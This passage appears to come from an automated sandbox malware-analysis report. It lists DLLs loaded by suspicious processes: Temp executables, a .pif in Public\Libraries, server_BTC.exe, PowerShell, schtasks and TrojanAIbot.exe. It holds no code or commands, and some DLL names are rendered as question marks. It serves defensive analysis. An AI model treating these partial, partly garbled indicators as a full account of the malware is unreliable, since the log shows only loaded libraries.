Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: smartscreenps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: smartscreenps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: winhttpcom.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??????????.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??????????.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??????????.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ???.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ???.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ???.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??l.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??l.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ?.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ?.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??l.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ????.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ???e???????????.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ???e???????????.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ?.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ?.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ?.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ?.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??l.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??l.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: tquery.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: cryptdll.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: spp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: vssapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: vsstrace.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: spp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: vssapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: vsstrace.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: endpointdlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: endpointdlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: endpointdlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: endpointdlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: spp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: vssapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: vsstrace.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: sppwmi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: sppcext.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: winscard.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: devobj.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\esentutl.exe	Section loaded: esent.dll	Jump to behavior
Source: C:\Windows\SysWOW64\esentutl.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\esentutl.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\esentutl.exe	Section loaded: esent.dll	Jump to behavior
Source: C:\Windows\SysWOW64\esentutl.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\esentutl.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\esentutl.exe	Section loaded: esent.dll	Jump to behavior
Source: C:\Windows\SysWOW64\esentutl.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\esentutl.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Section loaded: edputil.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\SysWOW64\timeout.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Section loaded: uxtheme.dll
